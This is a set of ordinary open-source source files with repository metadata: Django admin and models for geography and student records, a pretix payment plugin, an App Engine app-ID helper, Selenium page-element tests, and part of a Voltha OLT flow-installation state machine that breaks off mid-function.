"alnum_prop": 0.5422180214240706,
"repo_name": "sfam/home-assistant",
"id": "e1b0e1de306b0bbe15c12524552ee6b6f9e4f300",
"size": "3174",
"binary": false,
"copies": "3",
"ref": "refs/heads/dev",
"path": "homeassistant/components/device_tracker/owntracks.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "1338771"
},
{
"name": "Python",
"bytes": "1400448"
},
{
"name": "Shell",
"bytes": "4573"
}
],
"symlink_target": ""
}
|
from django.contrib import admin
from django.contrib.gis import admin as gis_admin
from geo.models import Region, Place
class RegionAdmin(gis_admin.OSMGeoAdmin):
point_zoom = 11
list_display = ['name', 'parent', 'level', 'description', 'code', 'iso3']
fields = ['name', 'level', 'description', 'code', 'iso3', 'border']
search_fields = ['name', 'code']
list_filter = ['feature_code', 'level']
admin.site.register(Region, RegionAdmin)
class PlaceAdmin(gis_admin.OSMGeoAdmin):
def queryset(self, request):
return super(PlaceAdmin, self).queryset(request).prefetch_related('parent')
point_zoom = 11
list_display = ['name', 'feature_code']
search_fields = ['name']
list_filter = ['feature_code']
raw_id_fields = ('parent', )
admin.site.register(Place, PlaceAdmin)
|
{
"content_hash": "385ead0744d0d05721f62b1180fc5c08",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 83,
"avg_line_length": 29.321428571428573,
"alnum_prop": 0.6699147381242387,
"repo_name": "jleivaizq/freesquare",
"id": "ff17bca8b5ffae697c34faf78d5e62fd85f578b8",
"size": "846",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "freesquare/geo/admin.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "223"
},
{
"name": "JavaScript",
"bytes": "1205"
},
{
"name": "Python",
"bytes": "56902"
}
],
"symlink_target": ""
}
|
from django.core.urlresolvers import reverse, resolve
from django.dispatch import receiver
from django.utils.translation import ugettext_lazy as _
from pretix.base.signals import register_payment_providers
from .payment import BankTransfer
from pretix.control.signals import nav_event
@receiver(register_payment_providers)
def register_payment_provider(sender, **kwargs):
return BankTransfer
@receiver(nav_event)
def control_nav_import(sender, request=None, **kwargs):
url = resolve(request.path_info)
if not request.eventperm.can_change_orders:
return []
return [
{
'label': _('Import bank data'),
'url': reverse('plugins:banktransfer:import', kwargs={
'event': request.event.slug,
'organizer': request.event.organizer.slug,
}),
'active': (url.namespace == 'plugins:banktransfer' and url.url_name == 'import'),
'icon': 'upload',
}
]
|
{
"content_hash": "a9fbe0cfc442ad824e2f3f93eca275eb",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 93,
"avg_line_length": 31.483870967741936,
"alnum_prop": 0.6577868852459017,
"repo_name": "Unicorn-rzl/pretix",
"id": "634bbcd4a0ee3b8eb6c8a68f1219f6bd25de7068",
"size": "976",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/pretix/plugins/banktransfer/signals.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "39129"
},
{
"name": "HTML",
"bytes": "153518"
},
{
"name": "JavaScript",
"bytes": "8986"
},
{
"name": "Makefile",
"bytes": "423"
},
{
"name": "Python",
"bytes": "593486"
},
{
"name": "Shell",
"bytes": "287"
}
],
"symlink_target": ""
}
|
"""Get the App Engine app ID from environment.
Not to be confused with `google.appengine.api.app_identity.get_application_id()`
which gets a "display" app ID.
"""
import os
from typing import MutableMapping, Text, Optional
OsEnvironLike = Optional[MutableMapping[Text, Text]]
def get(environ: OsEnvironLike = None) -> str:
"""Get the application ID from the environment.
Args:
environ: Environment dictionary. Uses os.environ if `None`.
Returns:
Default application ID as a string.
We read from the environment GAE_APPLICATION.
"""
if environ is None:
environ = os.environ
return environ.get('GAE_APPLICATION', '')
def put(app_id: str, environ: OsEnvironLike = None):
"""Set the application ID in the environment.
Args:
app_id: Application ID as a string.
environ: Environment dictionary. Uses os.environ if `None`.
"""
if environ is None:
environ = os.environ
environ['GAE_APPLICATION'] = app_id
def clear(environ: OsEnvironLike = None):
"""Unset the application ID in the environment.
Args:
environ: Environment dictionary. Uses os.environ if `None`.
"""
if environ is None:
environ = os.environ
environ.pop('GAE_APPLICATION', None)
_PARTITION_SEPARATOR = '~'
_DOMAIN_SEPARATOR = ':'
def parse(app_id: Optional[str] = None,
environ: OsEnvironLike = None):
"""Parses a full app ID into `partition`, `domain_name`, and `display_app_id`.
Args:
app_id: The full partitioned app ID. Looks up from environ if `None`.
environ: Environment dictionary. Uses os.environ if `None`.
Returns:
A tuple `(partition, domain_name, display_app_id)`. The partition and
domain name might be empty.
"""
if app_id is None:
app_id = get(environ)
partition = ''
psep = app_id.find(_PARTITION_SEPARATOR)
if psep > 0:
partition = app_id[:psep]
app_id = app_id[psep+1:]
domain_name = ''
dsep = app_id.find(_DOMAIN_SEPARATOR)
if dsep > 0:
domain_name = app_id[:dsep]
app_id = app_id[dsep+1:]
return partition, domain_name, app_id
def project_id(app_id: Optional[str] = None,
environ: OsEnvironLike = None):
"""Parses the domain prefixed project ID from the app_id.
Args:
app_id: The full partitioned app ID. Looks up from environ if `None`.
environ: Environment dictionary. Uses os.environ if `None`.
Returns:
A tuple `(partition, domain_name, display_app_id)`. The partition and
domain name might be empty.
"""
_, domain_name, display_app_id = parse(app_id, environ)
if domain_name:
return f'{domain_name}{_DOMAIN_SEPARATOR}{display_app_id}'
return display_app_id
|
{
"content_hash": "e3b4c2845245629ab0e9dc2fd5c9148b",
"timestamp": "",
"source": "github",
"line_count": 105,
"max_line_length": 80,
"avg_line_length": 25.304761904761904,
"alnum_prop": 0.6751975912683478,
"repo_name": "GoogleCloudPlatform/appengine-python-standard",
"id": "00f256bf11d82322782220d4f0b2f3f85baf43a5",
"size": "3257",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "src/google/appengine/api/full_app_id.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "3778254"
}
],
"symlink_target": ""
}
|
"""
Copyright 2015 Telefónica Investigación y Desarrollo, S.A.U.
This file is part of Toolium.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import mock
import pytest
from selenium.webdriver.common.by import By
from selenium.webdriver.remote.webelement import WebElement
from toolium.driver_wrapper import DriverWrapper
from toolium.driver_wrappers_pool import DriverWrappersPool
from toolium.pageelements import PageElement, Text, InputText, Button, Select, Group
from toolium.pageelements import select_page_element
from toolium.pageobjects.page_object import PageObject
child_element = 'child_element'
mock_element = None
def get_mock_select():
# Mock text property
mock_prop_text = mock.PropertyMock(return_value='option value')
mock_text = mock.MagicMock()
type(mock_text).text = mock_prop_text
# Mock first_selected_option property
mock_prop_option = mock.PropertyMock(return_value=mock_text)
mock_option = mock.MagicMock()
type(mock_option).first_selected_option = mock_prop_option
# Mock select
mock_select = mock.MagicMock(return_value=mock_option)
return mock_select
class Menu(Group):
logo = PageElement(By.ID, 'image')
class LoginPageObject(PageObject):
title = Text(By.ID, 'title')
username = InputText(By.XPATH, '//input[0]')
password = InputText(By.ID, 'password')
language = Select(By.ID, 'language')
login = Button(By.ID, 'login')
menu = Menu(By.ID, 'menu')
username_shadowroot = InputText(By.XPATH, '//input[1]', shadowroot='shadowroot_css')
@pytest.fixture
def driver_wrapper():
# Create a mock element
global mock_element
mock_element = mock.MagicMock(spec=WebElement)
mock_element.find_element.return_value = child_element
mock_element.text = 'text value'
mock_element.get_attribute.return_value = 'input text value'
# Reset wrappers pool values
DriverWrappersPool._empty_pool()
DriverWrapper.config_properties_filenames = None
# Create a new wrapper
driver_wrapper = DriverWrappersPool.get_default_wrapper()
driver_wrapper.driver = mock.MagicMock()
driver_wrapper.is_mobile_test = mock.MagicMock(return_value=False)
return driver_wrapper
def test_locator(driver_wrapper):
page_object = LoginPageObject(driver_wrapper)
assert page_object.title.locator == (By.ID, 'title')
assert page_object.username.locator == (By.XPATH, '//input[0]')
assert page_object.password.locator == (By.ID, 'password')
assert page_object.language.locator == (By.ID, 'language')
assert page_object.login.locator == (By.ID, 'login')
assert page_object.menu.locator == (By.ID, 'menu')
assert page_object.menu.logo.locator == (By.ID, 'image')
# Check that elements inside a group have the group as parent
assert page_object.menu.logo.parent == page_object.menu
def test_get_text(driver_wrapper):
driver_wrapper.driver.find_element.return_value = mock_element
title_value = LoginPageObject().title.text
assert title_value == 'text value'
def test_get_input_text(driver_wrapper):
driver_wrapper.driver.find_element.return_value = mock_element
username_value = LoginPageObject().username.text
assert username_value == 'input text value'
def test_set_input_text(driver_wrapper):
# Configure driver mock
driver_wrapper.driver.find_element.return_value = mock_element
driver_wrapper.is_ios_test = mock.MagicMock(return_value=False)
LoginPageObject().username.text = 'new input value'
mock_element.send_keys.assert_called_once_with('new input value')
def test_set_input_text_shadowroot(driver_wrapper):
# Configure driver mock
driver_wrapper.driver.find_element.return_value = mock_element
driver_wrapper.is_ios_test = mock.MagicMock(return_value=False)
text_value = 'new input value'
expected_script = 'return document.querySelector("shadowroot_css").shadowRoot.querySelector("//input[1]").value ' \
'= "new input value"'
LoginPageObject().username_shadowroot.text = text_value
mock_element.send_keys.assert_not_called()
driver_wrapper.driver.execute_script.assert_called_once_with(expected_script)
def test_set_input_text_shadowroot_quotation_marks(driver_wrapper):
# Configure driver mock
driver_wrapper.driver.find_element.return_value = mock_element
driver_wrapper.is_ios_test = mock.MagicMock(return_value=False)
text_value = 'new "input" value'
expected_script = 'return document.querySelector("shadowroot_css").shadowRoot.querySelector("//input[1]").value ' \
'= "new \\"input\\" value"'
LoginPageObject().username_shadowroot.text = text_value
mock_element.send_keys.assert_not_called()
driver_wrapper.driver.execute_script.assert_called_once_with(expected_script)
def test_get_selected_option(driver_wrapper):
select_page_element.SeleniumSelect = get_mock_select()
option = LoginPageObject().language.option
assert option == 'option value'
def test_set_option(driver_wrapper):
driver_wrapper.driver.find_element.return_value = mock_element
select_page_element.SeleniumSelect = get_mock_select()
LoginPageObject().language.option = 'new option value'
select_page_element.SeleniumSelect.assert_called_once_with(mock_element)
select_page_element.SeleniumSelect().select_by_visible_text.assert_called_once_with('new option value')
def test_click_button(driver_wrapper):
driver_wrapper.driver.find_element.return_value = mock_element
LoginPageObject().login.click()
mock_element.click.assert_called_once_with()
def test_group_reset_object(driver_wrapper):
login_page = LoginPageObject()
# Check that web elements are empty
assert login_page.menu._web_element is None
assert login_page.menu.logo._web_element is None
assert login_page.menu.logo.parent == login_page.menu
login_page.menu.logo.web_element
# Check that web elements are filled
assert login_page.menu._web_element is not None
assert login_page.menu.logo._web_element is not None
assert login_page.menu.logo.parent == login_page.menu
login_page.menu.reset_object()
# Check that web elements are empty
assert login_page.menu._web_element is None
assert login_page.menu.logo._web_element is None
assert login_page.menu.logo.parent == login_page.menu
|
{
"content_hash": "eba40ae9a6f9199b8d28f45f5db7bbea",
"timestamp": "",
"source": "github",
"line_count": 196,
"max_line_length": 119,
"avg_line_length": 35.03061224489796,
"alnum_prop": 0.7292455578211476,
"repo_name": "Telefonica/toolium",
"id": "d11724dd2dc4a965803a4336c25c15d1a86a22e0",
"size": "6892",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "toolium/test/pageelements/test_derived_page_element.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "1301"
},
{
"name": "HTML",
"bytes": "724"
},
{
"name": "JavaScript",
"bytes": "734"
},
{
"name": "Makefile",
"bytes": "2598"
},
{
"name": "Python",
"bytes": "560909"
}
],
"symlink_target": ""
}
|
"""Defines all Student's models.
Many of these modules are admin by Django Admin UI.
"""
from django.db import models
from apps.settings.models import Time
from django.conf import settings
class Grade(models.Model):
"""Grade table class."""
name = models.CharField(max_length='45', db_column='name', null=False, blank=False)
note = models.TextField(db_column='note', null=True, blank=True)
class Meta:
db_table = 'student_grade'
ordering = ['id']
verbose_name = 'grade'
verbose_name_plural = 'grades'
def __str__(self):
return '%s' % self.name
class Group(models.Model):
"""Group table class."""
name = models.CharField(max_length='45', db_column='name', null=False, blank=False)
note = models.TextField(db_column='note', null=True, blank=True)
class Meta:
db_table = 'student_group'
ordering = ['id']
verbose_name = 'group'
verbose_name_plural = 'groups'
def __str__(self):
return '%s' % self.name
class Room(models.Model):
"""Room table class."""
name = models.CharField(max_length='45', db_column='name', null=False, blank=False)
grade = models.ForeignKey(Grade, db_column='grade', on_delete=models.PROTECT)
group = models.ForeignKey(Group, db_column='group', on_delete=models.PROTECT)
note = models.TextField(db_column='note', null=True, blank=True)
class Meta:
db_table = 'student_room'
ordering = ['id']
verbose_name = 'room'
verbose_name_plural = 'rooms'
def __str__(self):
return '%s' % self.name
class StudentState(models.Model):
"""StudentState table class."""
name = models.CharField(max_length='45', db_column='name', null=False, blank=False)
note = models.TextField(db_column='note', null=True, blank=True)
class Meta:
db_table = 'student_student_state'
ordering = ['id']
verbose_name = 'student_state'
verbose_name_plural = 'student_states'
def __str__(self):
return '%s' % self.name
class Student(models.Model):
"""Student table class."""
name = models.CharField(max_length='45', db_column='name', null=False, blank=False)
lastname = models.CharField(max_length='45', db_column='lastname', null=False, blank=False)
room = models.ForeignKey(Room, db_column='room', on_delete=models.PROTECT)
note = models.TextField(db_column='note', null=True, blank=True)
state = models.ForeignKey(StudentState, db_column='state', on_delete=models.PROTECT)
user = models.ForeignKey(settings.AUTH_USER_MODEL, db_column='user', on_delete=models.PROTECT)
date_joined = models.DateField(db_column='date_joined', auto_now=True)
def get_name_complete(self):
return '%s %s' % (self.name, self.lastname)
class Meta:
db_table = 'student_student'
ordering = ['id']
verbose_name = 'student'
verbose_name_plural = 'students'
def __str__(self):
return '%s' % self.name
class Subject(models.Model):
"""Subject table class."""
name = models.CharField(max_length='45', db_column='name', null=False, blank=False)
note = models.TextField(db_column='note', null=True, blank=True)
user = models.ManyToManyField(settings.AUTH_USER_MODEL, through='UserHasSubject')
class Meta:
db_table = 'subject_subject'
ordering = ['id']
verbose_name = 'subject'
verbose_name_plural = 'subjects'
def __str__(self):
return '%s' % self.name
class UserHasSubject(models.Model):
"""UserHasSubject table class."""
user = models.ForeignKey(settings.AUTH_USER_MODEL, db_column='user', on_delete=models.PROTECT)
subject = models.ForeignKey(Subject, db_column='subject', on_delete=models.PROTECT)
room = models.ForeignKey(Room, db_column='room', on_delete=models.PROTECT)
class Meta:
db_table = 'subject_user_has_subject'
ordering = ['id']
def __str__(self):
return 'el usuario %s da la asignatura %s en el salon %s' % (self.user.username, self.subject.name, self.room.name)
class Absence(models.Model):
"""Absence table class."""
value = models.PositiveSmallIntegerField(db_column='value', null=False, blank=False)
time = models.ForeignKey(Time, db_column='time', on_delete=models.PROTECT)
student = models.ForeignKey(Student, db_column='student', on_delete=models.PROTECT)
subject = models.ForeignKey(Subject, db_column='subject', on_delete=models.PROTECT)
user = models.ForeignKey(settings.AUTH_USER_MODEL, db_column='user', on_delete=models.PROTECT)
class Meta:
db_table = 'student_absence'
ordering = ['id']
verbose_name = 'absence'
verbose_name_plural = 'absences'
def __str__(self):
return 'Absence %s' % self.student.name
|
{
"content_hash": "d7b2fab342e27aab35d509145045bc2a",
"timestamp": "",
"source": "github",
"line_count": 133,
"max_line_length": 117,
"avg_line_length": 33.38345864661654,
"alnum_prop": 0.7036036036036036,
"repo_name": "dairdr/notes",
"id": "3cd6a19c14cefa0d9e3c64b7313c993eb3964433",
"size": "4466",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "notes/apps/student/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "1171"
},
{
"name": "JavaScript",
"bytes": "78418"
},
{
"name": "Python",
"bytes": "66640"
}
],
"symlink_target": ""
}
|
"""
Handles sequence of messages that are used to send OMCI to the ONU
"""
import structlog
from scapy.automaton import ATMT
from voltha.adapters.microsemi_olt.BaseOltAutomaton import BaseOltAutomaton
from voltha.adapters.microsemi_olt.PAS5211 import PAS5211MsgSendFrame, PAS5211MsgGetOltVersionResponse, PAS5211MsgSendFrameResponse, \
PAS5211EventFrameReceived, PAS5211MsgHeader, PAS5211SetVlanGenConfigResponse
from voltha.extensions.omci.omci_frame import OmciFrame
from voltha.adapters.microsemi_olt.PAS5211 import PAS5211GetOnuAllocs, PAS5211GetOnuAllocsResponse, PAS5211GetSnInfo, \
PAS5211GetSnInfoResponse, PAS5211GetOnusRange, PAS5211GetOnusRangeResponse, PAS5211MsgSetOnuOmciPortId, \
PAS5211MsgSetOnuOmciPortIdResponse, PAS5211MsgSetOnuAllocId, PAS5211MsgSetOnuAllocIdResponse, \
PAS5211SetSVlanAtConfig, PAS5211SetSVlanAtConfigResponse, PAS5211SetVlanDownConfig, \
PAS5211SetVlanDownConfigResponse, PAS5211SetDownVlanHandl, PAS5211SetDownVlanHandlResponse, \
PAS5211SetUplinkVlanHandl, PAS5211SetDownstreamPolicingConfigResponse, PAS5211SetDownstreamPolicingConfig, \
PAS5211SetPortIdPolicingConfig, PAS5211UnsetPortIdPolicingConfig, \
PAS5211MsgSendDbaAlgorithmMsg, PAS5211MsgSendDbaAlgorithmMsgResponse, \
PAS5211SetUpstreamPolicingConfigResponse, PAS5211SetUpstreamPolicingConfig, \
PAS5211MsgSetPortIdConfig, PAS5211MsgSetPortIdConfigResponse, \
PAS5211MsgGetOnuIdByPortId, PAS5211MsgGetOnuIdByPortIdResponse, \
PAS5211SetVlanUplinkConfiguration, PAS5211SetVlanUplinkConfigurationResponse, PAS5211SetUplinkVlanHandlResponse, PAS5211SetVlanGenConfig, PAS5211SetVlanGenConfigResponse, \
PAS5211GetPortIdDownstreamPolicingConfig, PAS5211GetPortIdDownstreamPolicingConfigResponse, PAS5211RemoveDownstreamPolicingConfig, \
PAS5211MsgHeader, PAS5211UnsetPortIdPolicingConfigResponse, PAS5211RemoveDownstreamPolicingConfigResponse, \
PAS5211SetPortIdPolicingConfigResponse, PAS5211EventAlarmNotification
from voltha.adapters.microsemi_olt.PAS5211_constants import OMCI_GEM_IWTP_IW_OPT_8021P_MAPPER, PON_FALSE, \
PON_1_TO_1_VLAN_MODE, PON_TRUE, PON_VLAN_UNUSED_TAG, PON_VLAN_UNUSED_PRIORITY, PON_VLAN_REPLACE_PRIORITY, \
PON_OUTPUT_VLAN_PRIO_HANDLE_INCOMING_VLAN, PON_VLAN_UNCHANGED_PRIORITY, PON_OUTPUT_VLAN_PRIO_HANDLE_DONT_CHANGE, \
PON_OUTPUT_VLAN_PRIO_HANDLE_DL_VLAN_TABLE, PON_DL_VLAN_SVLAN_REMOVE, PON_DL_VLAN_CVLAN_NO_CHANGE, \
PON_VLAN_DEST_DATAPATH, GEM_DIR_BIDIRECT, OMCI_MAC_BRIDGE_PCD_LANFCS_FORWARDED, \
OMCI_MAC_BRIDGE_PCD_ENCAP_METHOD_LLC, OMCI_8021P_MSP_UNMARKED_FRAME_TAG_FRAME, OMCI_8021P_MSP_TP_TYPE_NULL, \
OMCI_EX_VLAN_TAG_OCD_ASSOCIATION_TYPE_PPTP_ETH_UNI, OMCI_EX_VLAN_TAG_OCD_DS_MODE_US_INVERSE, PMC_UPSTREAM_PORT, \
PON_DISABLE, PON_VLAN_CHANGE_TAG, PON_VLAN_DONT_CHANGE_TAG, PON_PORT_TYPE_GEM, PON_PORT_DESTINATION_CNI0, PON_ENABLE, SLA_gr_bw_gros, PYTHAGORAS_UPDATE_AID_SLA, \
SLA_gr_bw_gros, SLA_be_bw_gros, SLA_gr_bw_fine, SLA_be_bw_fine, PYTHAGORAS_DBA_DATA_COS, PYTHAGORAS_DBA_STATUS_REPORT_NSR, \
PMC_OFAL_NO_POLICY, UPSTREAM, DOWNSTREAM
from struct import pack, unpack
from voltha.adapters.microsemi_olt.OltRemoveFlowStateMachine import OltRemoveFlowStateMachine
log = structlog.get_logger()
MAX_RETRIES = 10
TIMEOUT = 5
class OltInstallFlowStateMachine(BaseOltAutomaton):
onu_id = None
channel_id = None
port_id = None
onu_session_id = None
alloc_id = None
policy_id = None
retries = 0
def parse_args(self, debug=0, store=0, **kwargs):
self.onu_id = kwargs.pop('onu_id')
self.channel_id = kwargs.pop('channel_id')
self.port_id = kwargs.pop('port_id')
self.onu_session_id = kwargs.pop('onu_session_id')
self.alloc_id = kwargs.pop('alloc_id')
self.svlan_id = kwargs.pop('svlan_id')
self.cvlan_id = kwargs.pop('cvlan_id')
self.uplink_bandwidth = kwargs.pop('uplink_bandwidth')
self.downlink_bandwidth = kwargs.pop('downlink_bandwidth')
BaseOltAutomaton.parse_args(self, debug=debug, store=store, **kwargs)
def master_filter(self, pkt):
if not super(OltInstallFlowStateMachine, self).master_filter(pkt):
return False
if PAS5211MsgHeader in pkt:
if PAS5211EventAlarmNotification not in pkt:
if PAS5211MsgGetOltVersionResponse not in pkt:
if pkt[PAS5211MsgHeader].channel_id == self.channel_id:
if pkt[PAS5211MsgHeader].onu_id == self.onu_id:
if OmciFrame not in pkt:
if PAS5211MsgSendFrameResponse not in pkt:
return True
return False
"""
States
"""
# Uplink states...
@ATMT.state(initial=1)
def send_msg(self):
log.debug('olt-flow-state-machine-start')
@ATMT.state()
def wait_set_gen_vlan_uplink_configuration_response(self):
pass
@ATMT.state()
def wait_set_port_id_configuration_response(self):
pass
@ATMT.state()
def wait_get_onu_id_by_port_id_response(self):
pass
@ATMT.state()
def wait_send_dba_algorithm_msg_response(self):
pass
@ATMT.state()
def wait_set_svlan_at_configuration_response(self):
pass
@ATMT.state()
def wait_set_vlan_uplink_configuration_response(self):
pass
@ATMT.state()
def wait_set_uplink_vlan_handling_response(self):
pass
# Downlink states...
@ATMT.state()
def wait_set_gen_vlan_downlink_configuration_response(self):
pass
@ATMT.state()
def wait_set_vlan_downlink_configuration_response(self):
pass
@ATMT.state()
def wait_set_downlink_vlan_handling_response(self):
pass
@ATMT.state()
def wait_get_port_id_downlink_policing_response(self):
pass
@ATMT.state()
def wait_unset_port_id_downlink_policing_response(self):
pass
@ATMT.state()
def wait_remove_downlink_policing_response(self):
pass
@ATMT.state()
def wait_set_downlink_policing_response(self):
pass
@ATMT.state()
def wait_set_port_id_policing_response(self):
pass
@ATMT.state(error=1)
def error(self, msg):
log.error(msg)
# # If any error, we remove the flow...
# olt = OltRemoveFlowStateMachine(iface=self.iface, comm=self.comm,
# target=self.target, device=self.device, onu_id=self.onu_id,
# channel_id=self.channel_id, port_id=self.port_id, onu_session_id=self.onu_session_id,
# alloc_id=self.alloc_id)
# olt.runbg()
raise self.end()
@ATMT.state(final=1)
def end(self):
log.debug('olt-flow-state-machine-end')
# pass
"""
Utils
"""
def px(self, pkt):
return self.p(pkt, channel_id=self.channel_id,
onu_id=self.onu_id,
onu_session_id=self.onu_session_id)
"""
Transitions
"""
@ATMT.condition(send_msg)
def install_flow(self):
log.debug("install-flow")
self.send_set_gen_vlan_uplink_configuration(self.device.device)
raise self.wait_set_gen_vlan_uplink_configuration_response()
@ATMT.timeout(wait_set_gen_vlan_uplink_configuration_response, TIMEOUT)
def timeout_wait_gen_vlan_uplink_configuration_response(self):
#log.debug('api-proxy-timeout')
if self.retries < MAX_RETRIES:
self.retries += 1
self.send_set_gen_vlan_uplink_configuration(self.device.device)
else:
raise self.error("Timeout for message PAS5211SetVlanGenConfigResponse")
@ATMT.receive_condition(wait_set_gen_vlan_uplink_configuration_response)
def wait_for_set_gen_vlan_uplink_configuration_response(self, pkt):
#log.debug('api-proxy-response')
if PAS5211SetVlanGenConfigResponse in pkt:
log.debug('[RESPONSE] PAS5211SetVlanGenConfigResponse')
self.send_set_port_id_configuration(self.device.device, PON_ENABLE, self.port_id, self.alloc_id)
raise self.wait_set_port_id_configuration_response()
else:
log.debug('Unexpected pkt {}'.format(pkt.summary()))
@ATMT.timeout(wait_set_port_id_configuration_response, TIMEOUT)
def timeout_wait_set_port_id_configuration_response(self):
#log.debug('api-proxy-timeout')
if self.retries < MAX_RETRIES:
self.retries += 1
self.send_set_port_id_configuration(self.device.device, PON_ENABLE, self.port_id, self.alloc_id)
else:
raise self.error("Timeout for message PAS5211MsgSetPortIdConfigResponse")
@ATMT.receive_condition(wait_set_port_id_configuration_response)
def wait_for_set_port_id_configuration_response(self, pkt):
#log.debug('api-proxy-response')
if PAS5211MsgSetPortIdConfigResponse in pkt:
log.debug('[RESPONSE] PAS5211MsgSetPortIdConfigResponse')
self.send_get_onu_id_by_port_id(self.device.device, self.port_id)
raise self.wait_get_onu_id_by_port_id_response()
else:
log.debug('Unexpected pkt {}'.format(pkt.summary()))
@ATMT.timeout(wait_get_onu_id_by_port_id_response, TIMEOUT)
def timeout_wait_get_onu_id_by_port_id_response(self):
#log.debug('api-proxy-timeout')
if self.retries < MAX_RETRIES:
self.retries += 1
self.send_get_onu_id_by_port_id(self.device.device, self.port_id)
else:
raise self.error("Timeout for message PAS5211MsgGetOnuIdByPortIdResponse")
@ATMT.receive_condition(wait_get_onu_id_by_port_id_response)
def wait_for_get_onu_id_by_port_id_response(self, pkt):
#log.debug('api-proxy-response')
if PAS5211MsgGetOnuIdByPortIdResponse in pkt:
log.debug('[RESPONSE] PAS5211MsgGetOnuIdByPortIdResponse')
self.send_send_dba_algorithm_msg(self.device.device, self.port_id, self.uplink_bandwidth)
raise self.wait_send_dba_algorithm_msg_response()
else:
log.debug('Unexpected pkt {}'.format(pkt.summary()))
@ATMT.timeout(wait_send_dba_algorithm_msg_response, TIMEOUT)
def timeout_wait_send_dba_algorithm_msg_response(self):
#log.debug('api-proxy-timeout')
if self.retries < MAX_RETRIES:
self.retries += 1
self.send_send_dba_algorithm_msg(self.device.device, self.port_id, self.uplink_bandwidth)
else:
raise self.error("Timeout for message PAS5211MsgSendDbaAlgorithmMsgResponse")
@ATMT.receive_condition(wait_send_dba_algorithm_msg_response)
def wait_for_send_dba_algorithm_msg_response(self, pkt):
#log.debug('api-proxy-response')
if PAS5211MsgSendDbaAlgorithmMsgResponse in pkt:
log.debug('[RESPONSE] PAS5211MsgSendDbaAlgorithmMsgResponse')
self.send_set_svlan_at_configuration(self.device.device, self.svlan_id)
raise self.wait_set_svlan_at_configuration_response()
else:
log.debug('Unexpected pkt {}'.format(pkt.summary()))
@ATMT.timeout(wait_set_svlan_at_configuration_response, TIMEOUT)
def timeout_wait_set_svlan_at_configuration_response(self):
#log.debug('api-proxy-timeout')
if self.retries < MAX_RETRIES:
self.retries += 1
self.send_set_svlan_at_configuration(self.device.device, self.svlan_id)
else:
raise self.error("Timeout for message PAS5211SetSVlanAtConfigResponse")
@ATMT.receive_condition(wait_set_svlan_at_configuration_response)
def wait_for_set_svlan_at_configuration_response(self, pkt):
#log.debug('api-proxy-response')
if PAS5211SetSVlanAtConfigResponse in pkt:
log.debug('[RESPONSE] PAS5211SetSVlanAtConfigResponse')
self.send_set_vlan_uplink_configuration(self.device.device, self.port_id)
raise self.wait_set_vlan_uplink_configuration_response()
else:
log.debug('Unexpected pkt {}'.format(pkt.summary()))
@ATMT.timeout(wait_set_vlan_uplink_configuration_response, TIMEOUT)
def timeout_wait_set_vlan_uplink_configuration_response(self):
#log.debug('api-proxy-timeout')
if self.retries < MAX_RETRIES:
self.retries += 1
self.send_set_vlan_uplink_configuration(self.device.device, self.port_id)
else:
raise self.error("Timeout for message PAS5211SetVlanUplinkConfigurationResponse")
@ATMT.receive_condition(wait_set_vlan_uplink_configuration_response)
def wait_for_set_vlan_uplink_configuration_response(self, pkt):
#log.debug('api-proxy-response')
if PAS5211SetVlanUplinkConfigurationResponse in pkt:
log.debug('[RESPONSE] PAS5211SetVlanUplinkConfigurationResponse')
self.send_set_uplink_vlan_handling(self.device.device, self.port_id, self.cvlan_id, self.svlan_id)
raise self.wait_set_uplink_vlan_handling_response()
else:
log.debug('Unexpected pkt {}'.format(pkt.summary()))
@ATMT.timeout(wait_set_uplink_vlan_handling_response, TIMEOUT)
def timeout_wait_set_uplink_vlan_handling_response(self):
#log.debug('api-proxy-timeout')
if self.retries < MAX_RETRIES:
self.retries += 1
self.send_set_uplink_vlan_handling(self.device.device, self.port_id, self.cvlan_id, self.svlan_id)
else:
raise self.error("Timeout for message PAS5211SetUplinkVlanHandlResponse")
@ATMT.receive_condition(wait_set_uplink_vlan_handling_response)
def wait_for_set_uplink_vlan_handling_response(self, pkt):
#log.debug('api-proxy-response')
if PAS5211SetUplinkVlanHandlResponse in pkt:
log.debug('[RESPONSE] PAS5211SetUplinkVlanHandlResponse')
self.send_set_gen_vlan_downlink_configuration(self.device.device)
raise self.wait_set_gen_vlan_downlink_configuration_response()
else:
log.debug('Unexpected pkt {}'.format(pkt.summary()))
@ATMT.timeout(wait_set_gen_vlan_downlink_configuration_response, TIMEOUT)
def timeout_wait_set_gen_vlan_downlink_configuration_response(self):
#log.debug('api-proxy-timeout')
if self.retries < MAX_RETRIES:
self.retries += 1
self.send_set_gen_vlan_downlink_configuration(self.device.device)
else:
raise self.error("Timeout for message PAS5211SetVlanGenConfigResponse")
@ATMT.receive_condition(wait_set_gen_vlan_downlink_configuration_response)
def wait_for_set_gen_vlan_downlink_configuration_response(self, pkt):
#log.debug('api-proxy-response')
if PAS5211SetVlanGenConfigResponse in pkt:
log.debug('[RESPONSE] PAS5211SetVlanGenConfigResponse')
self.send_set_vlan_downlink_configuration(self.device.device, self.svlan_id)
raise self.wait_set_vlan_downlink_configuration_response()
else:
log.debug('Unexpected pkt {}'.format(pkt.summary()))
@ATMT.timeout(wait_set_vlan_downlink_configuration_response, TIMEOUT)
def timeout_wait_set_vlan_downlink_configuration_response(self):
#log.debug('api-proxy-timeout')
